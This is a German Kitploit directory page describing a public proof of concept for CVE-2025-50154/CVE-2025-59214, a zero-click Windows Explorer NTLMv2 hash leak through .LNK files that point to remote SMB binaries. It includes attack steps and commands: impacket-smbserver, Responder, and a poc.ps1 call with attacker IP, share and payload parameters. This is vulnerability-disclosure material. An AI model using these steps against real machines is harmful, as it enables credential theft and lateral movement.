Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50154 — POCs für CVE-2025-50154 und CVE-2025-59214, Zero-Day-Schwachstellen im Windows-Datei-Explorer, die NTLMv2-SSP ohne Benutzerinteraktion offenlegen. Es handelt sich um einen Bypass für den Sicherheitspatch CVE-2025-24054. | Kitploit
Tools/GitHubGitHub/rubenformation/cve-2025-50154
SchwachstellenanalyseExploitationLaterale BewegungLernen & Bildung
GitHubrubenformation/cve-2025-50154

CVE-2025-50154

POCs für CVE-2025-50154 und CVE-2025-59214, Zero-Day-Schwachstellen im Windows-Datei-Explorer, die NTLMv2-SSP ohne Benutzerinteraktion offenlegen. Es handelt sich um einen Bypass für den Sicherheitspatch CVE-2025-24054.

Repository anzeigen
Webseite
551550vor 10 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-50154, CVE-2025-59214

Windows-Datei-Explorer Zero-Click-NTLMv2-SSP-Hash-Offenlegung

Von Ruben Enkaoua und Cymulate

Erster Blog: Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154)

Zweiter Blog: Zweimal gepatcht, weiterhin umgangen: Neues NTLM-Leak (CVE-2025-50154 Patch-Bypass)

Beschreibung


Während Microsoft ein Sicherheitsupdate für eine icon-basierte NTLM-Hash-Offenlegungsschwachstelle veröffentlichte, habe ich einen Bypass entdeckt, der es einem Angreifer weiterhin ermöglicht, NTLMv2-SSP-Hashes ohne Benutzerinteraktion zu erlangen.

Die ursprüngliche, kürzlich gepatchte Schwachstelle war eine 0-Click-NTLM-Hash-Offenlegung, die ausgelöst wurde, wenn explorer.exe das Icon einer .LNK-Verknüpfungsdatei rendert, deren Icon auf einem entfernten SMB-Server gehostet wurde.
Nach dem Patch lädt explorer.exe keine Icons mehr von entfernten SMB-Pfaden, wodurch die automatische Offenlegung von NTLM-Hashes verhindert wird.

Update: Der Patch für CVE-2025-50154 funktionierte überhaupt nicht. Wir haben ihn gemeldet, und der Schwachstelle wurde eine neue CVE zugewiesen: CVE-2025-59214. Der POC ist für beide CVEs relevant.

Durch Erstellen einer .LNK-Datei mit:

Starten Sie einen Responder-Server auf Ihrem Server Erstellen Sie mit PowerShell auf einem anderen Rechner eine bösartige LNK-Datei und legen Sie sie dann beim Opfer ab (bösartiger Download, SMB-Upload ...) Der explorer.exe-Prozess rendert das Icon, indem er die Datei automatisch herunterlädt und nach RT_ICON- und RT_GROUP_ICON-Headern im .rsrc-Abschnitt sucht. Dieser Code dient nur Bildungs- und Forschungszwecken. Der Autor übernimmt keine Verantwortung für eine missbräuchliche Verwendung dieses Codes.
  • Standardicon aus shell32.dll
  • Zielpfad, der auf eine entfernte, auf SMB gehostete Binärdatei zeigt

  • Der explorer.exe-Prozess ruft die entfernte Datei weiterhin ab, um das PE-Icon aus dessen RT_GROUP_ICON- und RT_ICON-Ressourcen zu extrahieren.

    DA-NTLMv2-SSP-leak

    Schritte




    root@kitploit:~
    # put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
    impacket-smbserver share . -smb2support
    



    root@kitploit:~
    # Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
    .\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"
    



    Hinweise



    Tool herunterladen